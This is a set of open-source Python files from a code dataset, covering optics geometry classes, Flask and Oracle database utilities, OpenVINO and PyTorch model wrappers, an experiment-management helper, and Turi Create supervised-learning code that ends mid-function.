self.reflection_coefficient = reflection_coefficient\n\n def get_tangent_line(self, point_on_circumference: Point) -> ReflectionLine:\n tangent_line = super().get_tangent_line(point_on_circumference)\n return ReflectionLine.construct_from_line(tangent_line, self.reflection_coefficient)\n\n\nclass RefractionCircle(Cirlce):\n def __init__(self, centre: Point, radius: float,\n inner_refraction_coefficient: float, outer_refraction_coefficient: float = 1) -> None:\n super().__init__(centre, radius)\n self.inner_refraction_coefficient = inner_refraction_coefficient\n self.outer_refraction_coefficient = outer_refraction_coefficient\n\n\n def get_tangent_line(self, point_on_circumference: Point) -> RefractionLine:\n tangent_line = super().get_tangent_line(point_on_circumference)\n direction = tangent_line.get_direction_to_point(self.centre)\n if direction == 'lod' or direction == 'lou':\n return RefractionLine.construct_from_line(tangent_line, self.inner_refraction_coefficient, self.outer_refraction_coefficient)\n return RefractionLine.construct_from_line(tangent_line, self.outer_refraction_coefficient, 
self.inner_refraction_coefficient)","repo_name":"leofeen/PhysicsGraphicalEngine","sub_path":"optical/opticalfigures.py","file_name":"opticalfigures.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"71696910029","text":"import subprocess\nfrom .env import env\n\n\nfind_module_path_script = r\"\"\"\\\nimport imp\nprint(imp.find_module('{}')[1])\n\"\"\"\n\n\ndef find_module_path(text, py2=False):\n    \" Try to find the filesystem location of a Python module. \"\n    module_path = subprocess.check_output([\n        \"python2\" if py2 else \"python3\",\n        \"-c\",\n        find_module_path_script.format(text)], env=env())\n    return module_path.decode('utf8').strip()\n\n\nget_module_list_script = r\"\"\"\\\nimport pkgutil\nimport os\n\nvalid_names = [\n    name for (loader, name, is_pkg) in pkgutil.iter_modules()\n    if hasattr(loader, 'path') and (\n        os.path.isfile(os.path.join(loader.path, name) + \".py\")\n        or os.path.isdir(os.path.join(loader.path, name))\n    )\n]\n\nprint(\"\\n\".join(valid_names))\n\"\"\"\n\n\ndef get_module_list(py2=False):\n    \" List of names of available modules for an interpreter \"\n    try:\n        raw_output = subprocess.check_output([\n            \"python2\" if py2 else \"python3\",\n            \"-c\",\n            get_module_list_script], env=env(), stderr=subprocess.STDOUT)\n        module_names = [\n            line.decode('utf8').strip()\n            for line in raw_output.splitlines() if line]\n        # Sort names case-insensitive and underbar-names to bottom\n        module_names.sort(key=str.upper)\n        return module_names\n    except subprocess.CalledProcessError as exc:\n        print(\"[Pypr] Error when calling python\")\n        print(exc.output)\n        return []\n","repo_name":"countergram/Pypr","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"22405286569","text":"\"\"\"\nUtilities\n=========\n\n\"\"\"\n\nfrom importlib import import_module\n\nfrom flask import current_app, jsonify, request\nfrom werkzeug.exceptions import HTTPException\n\n__all__ = [\n    'register_blueprint', 'set_oracle_client_info',\n    'jsonify_error', 'jsonify_jwt_error', 'bool_query_param', 'create_table_if_not_exist']\n\n\ndef register_blueprint(app, blueprint, package=None, path='modules'):\n    \"\"\"\n    Registering modules (:class:`flask.Blueprint`) in the application\n\n    .. note:: May need to run inside the `application context`_,\n        depending on how the particular module is organised\n\n    .. _`application context`: http://flask.pocoo.org/docs/1.0/appcontext/\n\n    :param app: the application instance\n    :type app: :class:`flask.Flask`\n    :param str blueprint: name of the module to load\n    :param str package: name of the package with the modules (defaults to\n        ``app.name``); see `import_module`_ for details\n    :param str path: directory with the modules inside the package\n\n    .. 
_`import_module`:\n https://docs.python.org/3/library/importlib.html#importlib.import_module\n \"\"\"\n try:\n module = import_module(\n f'.{path}.{blueprint}.controllers', package or app.name)\n app.register_blueprint(module.blueprint)\n app.logger.info(f'Module [{blueprint}] loaded')\n except ImportError as e:\n app.logger.warning(f'Skip module [{blueprint}]: {e}')\n except Exception as e:\n app.logger.error(f'Skip module [{blueprint}]: {e}', exc_info=1)\n\n\ndef create_table_if_not_exist(db, app, ):\n with app.app_context():\n table_name = 'JWT_USERS_PY'.lower()\n sequence_name = f'{table_name}_id_seq'\n if not db.engine.dialect.has_table(db.engine, table_name, 'gen_cfg_test_mt_85'):\n current_app.logger.debug(f'create table with name : {table_name}')\n metadata = db.MetaData(db.engine)\n db.Table(table_name, metadata,\n db.Column(\n 'id', db.Integer, primary_key=True),\n db.Column(\n 'username', db.String(30), index=True, unique=True, nullable=False)\n )\n db.engine.execute(f'create sequence {sequence_name} start with 1 increment by 1 nocache nocycle')\n metadata.create_all()\n table_name = 'SYSTEM_MESSAGES_FILIALS_PY'.lower()\n sequence_name = f'{table_name}_id_seq'\n if not db.engine.dialect.has_table(db.engine, table_name, 'gen_cfg_test_mt_85'):\n current_app.logger.debug(f'create table with name : {table_name}')\n metadata = db.MetaData(db.engine)\n db.Table(table_name, metadata,\n db.Column(\n 'alarm_id', db.Integer, primary_key=True, nullable=False),\n db.Column(\n 'guid', db.String(128), index=True),\n db.Column(\n 'filial_id', db.Integer\n ),\n db.Column('filial_name', db.String(128))\n )\n db.engine.execute(f'create sequence {sequence_name} start with 1 increment by 1 nocache nocycle')\n metadata.create_all()\n table_name = 'SYSTEM_MESSAGES_REGIONS_PY'.lower()\n sequence_name = f'{table_name}_id_seq'\n if not db.engine.dialect.has_table(db.engine, table_name, 'gen_cfg_test_mt_85'):\n current_app.logger.debug(f'create table with name : {table_name}')\n metadata = db.MetaData(db.engine)\n db.Table(table_name, metadata,\n db.Column('alarm_id', db.Integer, primary_key=True, nullable=False),\n db.Column('region', db.String(128)),\n db.Column('guid', db.String(128), index=True))\n db.engine.execute(f'create sequence {sequence_name} start with 1 increment by 1 nocache nocycle')\n metadata.create_all()\n table_name = 'SYSTEM_MESSAGES_SEGMENTS_PY'.lower()\n sequence_name = f'{table_name}_id_seq'\n if not db.engine.dialect.has_table(db.engine, table_name, 'gen_cfg_test_mt_85'):\n current_app.logger.debug(f'create table with name : {table_name}')\n metadata = db.MetaData(db.engine)\n db.Table(table_name, metadata,\n db.Column('alarm_id', db.Integer, primary_key=True, nullable=False),\n db.Column('segment', db.String(20)),\n db.Column('guid', db.String(128), index=True))\n db.engine.execute(f'create sequence {sequence_name} start with 1 increment by 1 nocache nocycle')\n metadata.create_all()\n table_name = 'SYSTEM_MESSAGES_PY'.lower()\n sequence_name = f'{table_name}_id_seq'\n if not db.engine.dialect.has_table(db.engine, table_name, 'gen_cfg_test_mt_85'):\n current_app.logger.debug(f'create table with name : {table_name}')\n metadata = db.MetaData(db.engine)\n db.Table(table_name, metadata,\n db.Column('alarm_id', db.Integer, primary_key=True, nullable=False),\n db.Column('text', db.String(2000)),\n db.Column('type', db.String(30)),\n db.Column('scheduled_start_time', db.Date()),\n db.Column('scheduled_stop_time', db.Date()),\n db.Column('send_mode', db.Integer),\n 
db.Column('send_threshold', db.Integer),\n                     db.Column('send_timeout', db.Integer),\n                     db.Column('service_type_attr1', db.String(30)),\n                     db.Column('wait_response_timeout', db.Integer),\n                     db.Column('region', db.String(30)))\n            db.engine.execute(f'create sequence {sequence_name} start with 1 increment by 1 nocache nocycle')\n            metadata.create_all()\n\n\ndef set_oracle_client_info(db, info):\n    \"\"\"\n    Set the client identifier for the Oracle session\n\n    .. attention:: Only works inside the `application context`_\n\n    .. _`application context`: http://flask.pocoo.org/docs/1.0/appcontext/\n\n    :param db: the SQLAlchemy instance\n    :type db: :class:`flask_sqlalchemy.SQLAlchemy`\n    :param str info: the identifier (any text)\n    \"\"\"\n    try:\n        query = 'begin dbms_application_info.set_client_info(:info); end;'\n        db.engine.execute(query, {'info': info})\n        current_app.logger.info(f'Oracle client info successfully set')\n\n    except Exception as e:\n        current_app.logger.warning(f'Oracle client info set error: {e}')\n\n\ndef jsonify_error(error):\n    \"\"\"\n    JSONify HTTP errors/statuses\n\n    :param error: the exception; passed **automatically** when used with\n        :meth:`Flask.register_error_handler`\n    :type error: :class:`Exception` or its subclasses\n    :return: a JSON response with the keys *status*, *message* and *error*\n    :rtype: :class:`flask.wrappers.Response`\n    \"\"\"\n\n    if not isinstance(error, HTTPException):\n        current_app.logger.critical(error, exc_info=1)\n        return jsonify(status=500, error='Internal', message='None'), 500\n\n    body = {\n        'status': error.code,\n        'message': error.description,\n        'error': error.name\n    }\n\n    if error.code == 405:\n        body['allowed'] = error.valid_methods\n\n    return jsonify(body), error.code\n\n\ndef jsonify_jwt_error(jwt):\n    \"\"\"\n    Bring JWT authorization errors to the common :func:`jsonify_error` format\n\n    :param jwt: the JWTManager instance\n    :type jwt: :class:`flask_jwt_extended.JWTManager`\n    \"\"\"\n\n    def unauth(msg):\n        return jsonify(status=401, error='Unauthorized', message=msg), 401\n\n    jwt.invalid_token_loader(lambda msg: unauth(f'Invalid token: {msg}'))\n    jwt.revoked_token_loader(lambda: unauth('Token has been revoked'))\n    jwt.expired_token_loader(lambda: unauth('Token has expired'))\n    jwt.unauthorized_loader(lambda msg: unauth(msg))\n    jwt.user_loader_error_loader(lambda msg: unauth('Unknown user'))\n\n\ndef bool_query_param(key):\n    \"\"\"Coerce the value of a query-string key to a boolean\"\"\"\n    value = request.args.get(key, None)\n    if value in ['False', 'false', '0', 0]:\n        return False\n    elif value:\n        return True\n","repo_name":"balkonsky/astportal","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
{"seq_id":"14445939636","text":"import cv2\nimport numpy as np\nfrom openvino.inference_engine import IENetwork,IECore\nimport sys\nimport logging\n\nclass Model_HeadPoseEstimation:\n\n    def __init__(self, model_name, device='CPU', extensions=None):\n        \n        self.model_name = model_name\n        self.device = device\n        self.extensions = extensions\n        self.plugin = None\n        self.network = None\n        self.exec_net = None\n        self.in_name = None\n        self.in_shape = None\n        self.out_name = None\n\n    def load_model(self):\n        \n        model_structure = self.model_name\n        model_weights = self.model_name.split('.')[0]+'.bin'\n\n        self.plugin = IECore()\n        \n        if self.extensions and 'CPU' in self.device:\n            self.plugin.add_extension(self.extensions,self.device)\n\n        
self.network = IENetwork(model=model_structure, weights=model_weights)\n\n self.check_model()\n\n self.exec_net = self.plugin.load_network(network=self.network, device_name=self.device,num_requests=1)\n \n self.in_name = next(iter(self.network.inputs))\n self.in_shape = self.network.inputs[self.in_name].shape\n self.out_name = [i for i in self.network.outputs.keys()]\n\n def predict(self, image):\n \n processed_image = self.preprocess_input(image.copy())\n outputs = self.exec_net.infer({self.in_name:processed_image})\n final = self.preprocess_output(outputs)\n return final\n\n def check_model(self): \n\n if self.device == \"CPU\": \n supported_layers = self.plugin.query_network(network=self.network, device_name=self.device) \n notsupported_layers = [l for l in self.network.layers.keys() if l not in supported_layers]\n\n if len(notsupported_layers) != 0:\n logging.error(\"[ERROR] Unsupported layers found: {}\".format(notsupported_layers))\n sys.exit(1)\n\n def preprocess_input(self, image):\n\n image_processed = cv2.resize(image,(self.in_shape[3], self.in_shape[2]))\n image_processed = image_processed.transpose(2, 0, 1)\n image_processed = image_processed.reshape(1, *image_processed.shape)\n return image_processed\n\n def preprocess_output(self, outputs):\n\n preprocessed_outputs = []\n preprocessed_outputs.append(outputs['angle_y_fc'].tolist()[0][0])\n preprocessed_outputs.append(outputs['angle_p_fc'].tolist()[0][0])\n preprocessed_outputs.append(outputs['angle_r_fc'].tolist()[0][0])\n return preprocessed_outputs","repo_name":"alaagamal98/computer-pointer-controller","sub_path":"src/head_pose_estimation.py","file_name":"head_pose_estimation.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"72911880587","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 27 13:34:21 2021\r\n\r\n@author: JIANG Yuxin\r\n\"\"\"\r\n\r\n\r\nimport torch.nn as nn\r\n\r\n\r\nclass AICModel(nn.Module):\r\n def __init__(self, model, n_label=3):\r\n super(AICModel, self).__init__()\r\n self.model = model #bert encoder\r\n for param in self.model.parameters():\r\n param.requires_grad = True \r\n self.d_hid = model.config.hidden_size\r\n self.classifier = nn.Linear(self.d_hid, n_label)\r\n\r\n def forward(\r\n self,\r\n input_ids=None,\r\n attention_mask=None,\r\n token_type_ids=None,\r\n ):\r\n\r\n outputs = self.model(\r\n input_ids,\r\n attention_mask=attention_mask,\r\n token_type_ids=token_type_ids,\r\n )\r\n \r\n pooled_output = outputs[1]\r\n logits = self.classifier(pooled_output)\r\n \r\n return logits, pooled_output\r\n \r\n \r\n ","repo_name":"YJiangcm/argument-impact-classification","sub_path":"model/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"82"} +{"seq_id":"71110186189","text":"import torch\nfrom torch import nn\n\nfrom .dl import QuantGAN_TemporalBlock\n\ndef is_high_freq(time_series, threshold=0.5, rolling_parts=200):\n orig_std = time_series.std().values[0]\n ma_ts = time_series.rolling(len(time_series) // rolling_parts).mean()\n ma_std = ma_ts.std().values[0]\n return abs(ma_std - orig_std) / orig_std > threshold\n\ndef ma(time_series, rolling_parts=200, window=None):\n if window is None:\n window = max(len(time_series) // rolling_parts, 2)\n ts1 = time_series.rolling(window, closed=\"left\").mean()\n ts2 = time_series[:: - 1].rolling(window).mean()[:: - 1]\n 
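# ts1 is NaN at the start (left-closed window) and ts2 near the end; the\n    # fills below patch each one's missing edge with the other's values, so\n    # their average acts as a roughly centred moving mean over the full index\n    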
ts1[ts1.isna()] = ts2[ts1.isna()]\n ts2[ts2.isna()] = ts1[ts2.isna()]\n ats = (ts1 + ts2) / 2\n return ats\n\n\nclass TimeDiffusion(nn.Module):\n def __init__(self):\n super().__init__()\n self.tcn = nn.ModuleList([QuantGAN_TemporalBlock(1, 128, kernel_size=1, stride=1, dilation=1, padding=0, dropout=0.25),\n *[QuantGAN_TemporalBlock(128, 128, kernel_size=2, stride=1, dilation=i, padding=i, dropout=0.0)\n for i in [2 ** i for i in range(14)]]])\n self.last = nn.Conv1d(128, 1, kernel_size=1, stride=1, dilation=1)\n\n def forward(self, x):\n skip_layers = []\n for layer in self.tcn:\n skip, x = layer(x)\n skip_layers.append(skip)\n x = self.last(x + sum(skip_layers))\n return x","repo_name":"timetoai/TimeDiffusion_synth","sub_path":"utils/timediffusion.py","file_name":"timediffusion.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"69916520909","text":"import numpy as np\nfrom itertools import product\n\nfrom theano import shared\n\n\nclass Experiments(object):\n def __init__(self, input_dim, num_classes):\n self.input_dim = input_dim\n self.num_classes = num_classes\n\n self.layers_descriptions = {}\n self.parameters = {}\n self.experiments = {}\n self.results = {}\n\n def get_layers_definition(self, idx):\n layers_description = self.get_layers_description_by_exp_idx(idx)\n parameters = self.get_parameters_by_exp_idx(idx)\n\n # Shared variable used for always activating one block in a layer\n # as in the input and output layer\n self.one_block_idxs = shared(\n np.zeros((parameters['batch_size'], 1), dtype='int64'),\n name='one_block_idxs'\n )\n\n n_hids = layers_description['n_hids']\n n_units_per = layers_description['n_units_per']\n k_pers = layers_description['k_pers']\n activations = layers_description['activations']\n index_selection_funcs = layers_description.get(\n 'index_selection_funcs',\n (None,)*len(activations)\n )\n layer_classes = layers_description['layer_classes']\n assert(len(activations) == len(index_selection_funcs))\n\n new_exp = []\n new_exp.append({\n 'n_in': self.input_dim,\n 'n_hids': n_hids[0],\n 'n_units_per': n_units_per,\n 'in_idxs': self.one_block_idxs,\n 'k': k_pers[0],\n 'activation': activations[0],\n 'index_selection_func': index_selection_funcs[0],\n 'layer_class': layer_classes[0]\n })\n for i in range(1, len(k_pers) - 1):\n new_exp.append({\n 'n_in': n_hids[i-1],\n 'n_hids': n_hids[i],\n 'n_units_per': n_units_per,\n 'k': k_pers[i],\n 'activation': activations[i],\n 'index_selection_func': index_selection_funcs[i],\n 'layer_class': layer_classes[i]\n })\n new_exp.append({\n 'n_in': n_hids[-1],\n 'n_hids': self.num_classes,\n 'n_units_per': n_units_per,\n 'out_idxs': self.one_block_idxs,\n 'k': k_pers[-1],\n 'activation': activations[-1],\n 'index_selection_func': index_selection_funcs[-1],\n 'layer_class': layer_classes[-1]\n })\n\n return new_exp\n\n def add_layers_description(self, idx, layers_description):\n self.layers_descriptions[idx] = layers_description\n\n def get_layers_description(self, idx):\n return self.layers_descriptions[idx]\n\n def get_layers_description_by_exp_idx(self, exp_idx):\n return self.get_layers_description(\n self.experiments[exp_idx]['layers_description_idx']\n )\n\n def add_parameters(self, idx, parameters):\n self.parameters[idx] = parameters\n\n def get_parameters(self, idx):\n return self.parameters[idx]\n\n def get_parameters_by_exp_idx(self, exp_idx):\n return 
self.get_parameters(self.experiments[exp_idx]['parameters_idx'])\n\n    def get_table_idxs_by_exp_idxs(self, table, exp_idxs):\n        result = set()\n        for exp_idx in exp_idxs:\n            result.add(self.experiments[exp_idx]['%s_idx' % table])\n        return result\n\n    def get_result_idxs_by_table_idx(self, table, idx):\n        results = []\n        for r_idx in self.results.keys():\n            if self.experiments[r_idx]['%s_idx' % table] == idx:\n                results.append(r_idx)\n        return results\n\n    def create_experiments(\n        self, layers_descriptions_idxs=[], parameters_idxs=[]\n    ):\n        \"\"\"\n        Creates an experiment for each combination of layers and parameters\n        \"\"\"\n        assert(type(layers_descriptions_idxs) == list)\n        assert(type(parameters_idxs) == list)\n\n        # Determine which layers and parameters to use\n        if len(layers_descriptions_idxs) == 0:\n            layers_descriptions_idxs = range(len(self.layers_descriptions))\n\n        if len(parameters_idxs) == 0:\n            parameters_idxs = range(len(self.parameters))\n\n        # Create the experiments\n        for idx, (ld_idx, p_idx) in enumerate(product(\n            layers_descriptions_idxs,\n            parameters_idxs\n        )):\n            self.experiments[idx] = {\n                'layers_description_idx': ld_idx,\n                'parameters_idx': p_idx\n            }\n            self.results[idx] = {}\n\n    def get_idxs(self, table, filters=[], has_results=False):\n        \"\"\"\n        Returns a list of idxs from the specified table matching the specified\n        filters. Filters should be a list of (column name, required value)\n        pairs.\n\n        has_results determines whether there are results for a given\n        experiment and is only relevant when searching the experiments table.\n        \"\"\"\n        assert(type(filters) == list)\n\n        if table == 'experiments':\n            source = self.experiments\n        elif table == 'parameters':\n            source = self.parameters\n        elif table == 'layers_descriptions':\n            source = self.layers_descriptions\n\n        if len(filters) == 0:\n            return source.keys()\n\n        results = []\n        for idx, values in source.iteritems():\n            good = True\n\n            # Determine whether the current record fits all the filters\n            for k, v in filters:\n                if values[k] != v:\n                    good = False\n\n            # Determine whether there are results for this experiment\n            if has_results and idx not in self.results.keys():\n                good = False\n\n            if good:\n                results.append(idx)\n        return results\n\n    def get_experiment_idxs(\n        self, layers_description_idx=[], parameters_idx=[]\n    ):\n        assert(type(layers_description_idx) == list)\n        assert(type(parameters_idx) == list)\n\n        results = []\n        for exp_idx, idxs in self.experiments.iteritems():\n            good = True\n            if (\n                len(layers_description_idx) > 0 and\n                idxs['layers_description_idx']\n                not in layers_description_idx\n            ):\n                good = False\n            if (\n                len(parameters_idx) > 0 and\n                idxs['parameters_idx'] not in parameters_idx\n            ):\n                good = False\n            if good:\n                results.append(exp_idx)\n        return results\n\n    def save(self, exp_id, model_name, k, v):\n        if model_name not in self.results[exp_id].keys():\n            self.results[exp_id][model_name] = {}\n        self.results[exp_id][model_name][k] = v\n\n    class ExperimentsIterator(object):\n        def __init__(self, exps):\n            self.exps = exps\n\n            self.current_idx = 0\n            self.stop_idx = len(self.exps.experiments) - 1\n\n        def __iter__(self):\n            return self\n\n        def next(self):\n            if self.current_idx > self.stop_idx:\n                raise StopIteration\n\n            self.current_idx += 1\n            return self.current_idx - 1\n\n    def __iter__(self):\n        return 
self.ExperimentsIterator(self)\n\n\n","repo_name":"daemonmaker/biglittle","sub_path":"experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":7273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"44866280759","text":"from __future__ import print_function as _\nfrom __future__ import division as _\nfrom __future__ import absolute_import as _\nimport turicreate as _turicreate\n\nfrom turicreate.toolkits._model import Model\nfrom turicreate.toolkits._internal_utils import _raise_error_if_not_sframe\nfrom turicreate.toolkits._internal_utils import _validate_data\nfrom turicreate.toolkits._main import ToolkitError\nfrom turicreate._cython.cy_server import QuietProgress\n\n\nclass SupervisedLearningModel(Model):\n \"\"\"\n Supervised learning module to predict a target variable as a function of\n several feature variables.\n \"\"\"\n\n def __init__(self, model_proxy=None, name=None):\n self.__proxy__ = model_proxy\n self.__name__ = name\n\n @classmethod\n def _native_name(cls):\n return None\n\n def __str__(self):\n \"\"\"\n Return a string description of the model to the ``print`` method.\n\n Returns\n -------\n out : string\n A description of the model.\n \"\"\"\n return self.__class__.__name__\n\n def __repr__(self):\n \"\"\"\n Returns a string description of the model, including (where relevant)\n the schema of the training data, description of the training data,\n training statistics, and model hyperparameters.\n\n Returns\n -------\n out : string\n A description of the model.\n \"\"\"\n return self.__class__.__name__\n\n def predict(\n self, dataset, missing_value_action=\"auto\", output_type=\"\", options={}, **kwargs\n ):\n \"\"\"\n Return predictions for ``dataset``, using the trained supervised_learning\n model. Predictions are generated as class labels (0 or\n 1).\n\n Parameters\n ----------\n dataset : SFrame\n Dataset of new observations. Must include columns with the same\n names as the features used for model training, but does not require\n a target column. Additional columns are ignored.\n\n missing_value_action: str, optional\n Action to perform when missing values are encountered. This can be\n one of:\n\n - 'auto': Choose a model dependent missing value policy.\n - 'impute': Proceed with evaluation by filling in the missing\n values with the mean of the training data. Missing\n values are also imputed if an entire column of data is\n missing during evaluation.\n - 'none': Treat missing value as is. 
Model must be able to handle missing value.\n - 'error' : Do not proceed with prediction and terminate with\n an error message.\n\n output_type : str, optional\n output type that maybe needed by some of the toolkits\n\n options : dict\n additional options to be passed in to prediction\n\n kwargs : dict\n additional options to be passed into prediction\n\n Returns\n -------\n out : SArray\n An SArray with model predictions.\n \"\"\"\n if missing_value_action == \"auto\":\n missing_value_action = select_default_missing_value_policy(self, \"predict\")\n\n # Low latency path\n if isinstance(dataset, list):\n return self.__proxy__.fast_predict(\n dataset, missing_value_action, output_type\n )\n if isinstance(dataset, dict):\n return self.__proxy__.fast_predict(\n [dataset], missing_value_action, output_type\n )\n\n # Batch predictions path\n else:\n _raise_error_if_not_sframe(dataset, \"dataset\")\n\n return self.__proxy__.predict(dataset, missing_value_action, output_type)\n\n def evaluate(\n self,\n dataset,\n metric=\"auto\",\n missing_value_action=\"auto\",\n with_predictions=False,\n options={},\n **kwargs\n ):\n \"\"\"\n Evaluate the model by making predictions of target values and comparing\n these to actual values.\n\n Parameters\n ----------\n dataset : SFrame\n Dataset in the same format used for training. The columns names and\n types of the dataset must be the same as that used in training.\n\n metric : str, list[str]\n Evaluation metric(s) to be computed.\n\n missing_value_action: str, optional\n Action to perform when missing values are encountered. This can be\n one of:\n\n - 'auto': Choose a model dependent missing value policy.\n - 'impute': Proceed with evaluation by filling in the missing\n values with the mean of the training data. Missing\n values are also imputed if an entire column of data is\n missing during evaluation.\n - 'none': Treat missing value as is. Model must be able to handle missing value.\n - 'error' : Do not proceed with prediction and terminate with\n an error message.\n\n options : dict\n additional options to be passed in to prediction\n\n kwargs : dict\n additional options to be passed into prediction\n \"\"\"\n if missing_value_action == \"auto\":\n missing_value_action = select_default_missing_value_policy(self, \"evaluate\")\n\n _raise_error_if_not_sframe(dataset, \"dataset\")\n results = self.__proxy__.evaluate(\n dataset, missing_value_action, metric, with_predictions=with_predictions\n )\n return results\n\n def _training_stats(self):\n \"\"\"\n Return a dictionary containing statistics collected during model\n training. These statistics are also available with the ``get`` method,\n and are described in more detail in the documentation for that method.\n\n Notes\n -----\n \"\"\"\n return self.__proxy__.get_train_stats()\n\n def _get(self, field):\n \"\"\"\n Get the value of a given field.\n\n Parameters\n ----------\n field : string\n Name of the field to be retrieved.\n\n Returns\n -------\n out : [various]\n The current value of the requested field.\n \"\"\"\n return self.__proxy__.get_value(field)\n\n\nclass Classifier(SupervisedLearningModel):\n \"\"\"\n Classifier module to predict a discrete target variable as a function of\n several feature variables.\n \"\"\"\n\n @classmethod\n def _native_name(cls):\n return None\n\n def classify(self, dataset, missing_value_action=\"auto\"):\n \"\"\"\n Return predictions for ``dataset``, using the trained supervised_learning\n model. 
Predictions are generated as class labels (0 or\n 1).\n\n Parameters\n ----------\n dataset: SFrame\n Dataset of new observations. Must include columns with the same\n names as the features used for model training, but does not require\n a target column. Additional columns are ignored.\n\n missing_value_action: str, optional\n Action to perform when missing values are encountered. This can be\n one of:\n\n - 'auto': Choose model dependent missing value action\n - 'impute': Proceed with evaluation by filling in the missing\n values with the mean of the training data. Missing\n values are also imputed if an entire column of data is\n missing during evaluation.\n - 'error': Do not proceed with prediction and terminate with\n an error message.\n Returns\n -------\n out : SFrame\n An SFrame with model predictions.\n \"\"\"\n if missing_value_action == \"auto\":\n missing_value_action = select_default_missing_value_policy(self, \"classify\")\n\n # Low latency path\n if isinstance(dataset, list):\n return self.__proxy__.fast_classify(dataset, missing_value_action)\n if isinstance(dataset, dict):\n return self.__proxy__.fast_classify([dataset], missing_value_action)\n\n _raise_error_if_not_sframe(dataset, \"dataset\")\n return self.__proxy__.classify(dataset, missing_value_action)\n\n\ndef print_validation_track_notification():\n print(\n \"PROGRESS: Creating a validation set from 5 percent of training data. This may take a while.\\n\"\n \" You can set ``validation_set=None`` to disable validation tracking.\\n\"\n )\n\n\ndef create(\n dataset,\n target,\n model_name,\n features=None,\n validation_set=\"auto\",\n distributed=\"auto\",\n verbose=True,\n seed=None,\n **kwargs\n):\n \"\"\"\n Create a :class:`~turicreate.toolkits.SupervisedLearningModel`,\n\n This is generic function that allows you to create any model that\n implements SupervisedLearningModel This function is normally not called, call\n specific model's create function instead\n\n Parameters\n ----------\n dataset : SFrame\n Dataset for training the model.\n\n target : string\n Name of the column containing the target variable. The values in this\n column must be 0 or 1, of integer type.\n\n model_name : string\n Name of the model\n\n features : list[string], optional\n List of feature names used by feature column\n\n validation_set : SFrame, optional\n A dataset for monitoring the model's generalization performance.\n For each row of the progress table, the chosen metrics are computed\n for both the provided training dataset and the validation_set. The\n format of this SFrame must be the same as the training set.\n By default this argument is set to 'auto' and a validation set is\n automatically sampled and used for progress printing. If\n validation_set is set to None, then no additional metrics\n are computed. The default value is 'auto'.\n\n distributed: env\n The distributed environment\n\n verbose : boolean\n whether print out messages during training\n\n seed : int, optional\n Seed for random number generation. 
Set this value to ensure that the\n        same model is created every time.\n\n    kwargs : dict\n        Additional parameter options that can be passed\n    \"\"\"\n\n    # Perform error-checking and trim inputs to specified columns\n    dataset, validation_set = _validate_data(dataset, target, features, validation_set)\n\n    # Sample a validation set from the training data if requested\n    if isinstance(validation_set, str):\n        assert validation_set == \"auto\"\n        if dataset.num_rows() >= 100:\n            if verbose:\n                print_validation_track_notification()\n            dataset, validation_set = dataset.random_split(0.95, seed=seed, exact=True)\n        else:\n            validation_set = _turicreate.SFrame()\n    elif validation_set is None:\n        validation_set = _turicreate.SFrame()\n\n    # Sanitize model-specific options\n    options = {k.lower(): kwargs[k] for k in kwargs}\n\n    # Create a model instance and train it\n    model = _turicreate.extensions.__dict__[model_name]()\n    with QuietProgress(verbose):\n        model.train(dataset, target, validation_set, options)\n\n    return SupervisedLearningModel(model, model_name)\n\n\ndef create_classification_with_model_selector(\n    dataset, target, model_selector, features=None, validation_set=\"auto\", verbose=True\n):\n    \"\"\"\n    Create a :class:`~turicreate.toolkits.SupervisedLearningModel`.\n\n    This is a generic function that allows you to create any model that\n    implements SupervisedLearningModel. This function is normally not called; call a\n    specific model's create function instead.\n\n    Parameters\n    ----------\n    dataset : SFrame\n        Dataset for training the model.\n\n    target : string\n        Name of the column containing the target variable. The values in this\n        column must be discrete class labels.\n\n    model_selector: function\n        Function that maps (num_classes, dataset sample) to a list of candidate\n        model names to fit.\n\n    features : list[string], optional\n        List of feature names used by feature column\n\n    validation_set : SFrame | str, optional\n        Validation data, or 'auto' to sample a validation set from ``dataset``.\n\n    verbose : boolean\n        whether to print out messages during training\n\n    \"\"\"\n\n    # Perform error-checking and trim inputs to specified columns\n    dataset, validation_set = _validate_data(dataset, target, features, validation_set)\n\n    # Sample the data\n    features_sframe = dataset\n    if features_sframe.num_rows() > 1e5:\n        fraction = 1.0 * 1e5 / features_sframe.num_rows()\n        features_sframe = features_sframe.sample(fraction, seed=0)\n\n    # Get available models for this dataset\n    num_classes = len(dataset[target].unique())\n    selected_model_names = model_selector(num_classes, features_sframe)\n\n    # Create a validation set\n    if isinstance(validation_set, str):\n        if validation_set == \"auto\":\n            if dataset.num_rows() >= 100:\n                if verbose:\n                    print_validation_track_notification()\n                dataset, validation_set = dataset.random_split(0.95, exact=True)\n            else:\n                validation_set = None\n        else:\n            raise TypeError(\"Unrecognized value for validation_set.\")\n\n    # Match C++ model names with user model names\n    python_names = {\n        \"boosted_trees_classifier\": \"BoostedTreesClassifier\",\n        \"random_forest_classifier\": \"RandomForestClassifier\",\n        \"decision_tree_classifier\": \"DecisionTreeClassifier\",\n        \"classifier_logistic_regression\": \"LogisticClassifier\",\n        \"classifier_svm\": \"SVMClassifier\",\n    }\n\n    # Print useful user-facing progress messages\n    if verbose:\n        print(\"PROGRESS: The following methods are available for this type of problem.\")\n        print(\"PROGRESS: \" + \", \".join([python_names[x] for x in selected_model_names]))\n        if len(selected_model_names) > 1:\n            print(\n                \"PROGRESS: The returned model will be chosen according to validation accuracy.\"\n            )\n\n    models = {}\n    metrics = {}\n
